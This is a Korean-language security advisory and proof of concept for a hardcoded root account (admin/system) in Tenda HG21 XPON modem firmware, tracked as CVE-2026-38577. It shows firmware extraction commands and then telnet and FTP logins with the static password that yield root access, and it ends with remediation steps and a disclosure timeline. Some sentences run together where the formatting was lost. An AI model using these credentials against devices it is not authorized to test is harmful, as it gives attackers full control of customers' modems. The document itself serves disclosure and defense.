
Tenda HG21 XPON 모뎀 펌웨어의 하드코딩된 루트 자격 증명(admin/system)을 시연하는 Proof-of-concept로, telnet 및 FTP를 통한 무단 루트 접근을 가능하게 합니다.
| 필드 | 값 |
|---|---|
| CVE ID | CVE-2026-38577 |
| 공급업체 | Tenda |
| 제품 | Tenda HG21 (XPON 광모뎀) |
| 영향받는 버전 | V4.0.0-260302 |
| 제품 키 | HG21-V1.0-TDE01 |
| 하드웨어 버전 | V1.0 |
| 펌웨어 빌드 날짜 | 2026-03-02 |
| 펌웨어 파일 | US_HG21re_300002982_en_xpon_2.zip |
| 취약점 클래스 | CWE-798: 하드코딩된 자격 증명 사용 |
| 발견자 | Anmol Singh Rajput — 독립 보안 연구원 |
| 공개 상태 | CVE 예약 시점에 공급업체에 아직 통보되지 않음 — CVE 배정일로부터 90일 책임 있는 공개 일정 적용 |
Tenda HG21 XPON 광모뎀의 펌웨어 분석 결과, 출고 펌웨어 이미지에 하드코딩된 관리자 계정이 내장되어 있는 것으로 확인되었습니다. 이 계정에는 전체 루트 권한(UID 0)이 부여되며, 해당 자격 증명은 모든 기기에서 동일하게 고정되어 있습니다. 즉, 취약한 기기의 노출된 관리 서비스에 접근할 수 있는 공격자는 고객이 설정한 웹 UI 비밀번호를 알 필요 없이 루트로 인증할 수 있습니다.
/etc/passwd에는 admin 항목이 포함되어 있으며, SHA256crypt
비밀번호 해시가 정적 값 system으로 해석됩니다.0입니다. 즉, 제한된 서비스 계정이 아니라 루트입니다./etc/shadow가 존재하지 않으므로 passwd의 취약한/정적 해시가 계정을 보호하는
유일한 관문입니다./etc/inetd.conf는 telnetd와 ftpd를 시작하며, 둘 다 루트로 실행되므로
하드코딩된 계정은 직렬/UART 콘솔뿐만 아니라 네트워크를 통해서도 접근할 수 있습니다.취약한 기기의 텔넷(TCP/23) 또는 FTP(TCP/21) 서비스에 네트워크로 접근할 수 있는
공격자는 정적 비밀번호를 사용하여 admin으로 로그인하고 루트 셸/루트 수준 파일
접근 권한을 얻을 수 있습니다. 이를 통해 최소한 다음이 가능합니다:
원래 제출물의 CVSS 벡터(게시 후 공급업체 점수는 다를 수 있음):
이는 자격 증명 기반 PoC입니다. 하드코딩된 계정이 인증되고 루트 권한을 부여한다는 것을 입증하며, 메모리 손상 익스플로잇이 아닙니다. 소유한 기기 또는 명시적으로 테스트 권한을 부여받은 기기에 대해서만 실행하십시오.
# 펌웨어 추출 (binwalk 또는 원하는 공급업체 도구)
binwalk -e US_HG21re_300002982_en_xpon_2.bin
# passwd 파일 찾기 및 검사
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<"system"의 sha256crypt 해시>:0:0:root:/root:/bin/sh
nmap -p 21,23 <target-ip>
telnet <target-ip>
# login: admin
# password: system
ftp <target-ip>
# Name: admin
# Password: system
두 서비스 중 하나에서 성공적으로 로그인하면 루트 권한 셸/FTP 세션이
반환됩니다(id는 uid=0(root)를 보고합니다).
admin/system 계정을 완전히 제거하거나, 최소한
첫 부팅 시 일련번호만으로 유추할 수 없는 고유한 기기별 무작위 비밀번호를
강제로 설정해야 합니다.telnetd/ftpd를 기본적으로 비활성화하고, 원격 관리를 위해 명시적인
옵트인과 인증된 암호화 채널(SSH/SFTP)을 요구해야 합니다.| 날짜 | 이벤트 |
|---|---|
| 2026-03-02 | 취약한 펌웨어 빌드 출시 |
| — | 독립적인 펌웨어 분석 중 발견 |
| 2026-04-09 | MITRE를 통해 CVE-2026-38577 예약 |
| — | 공급업체 통보 대기 중(CVE 배정일로부터 90일 공개 기간) |
발견 및 보고: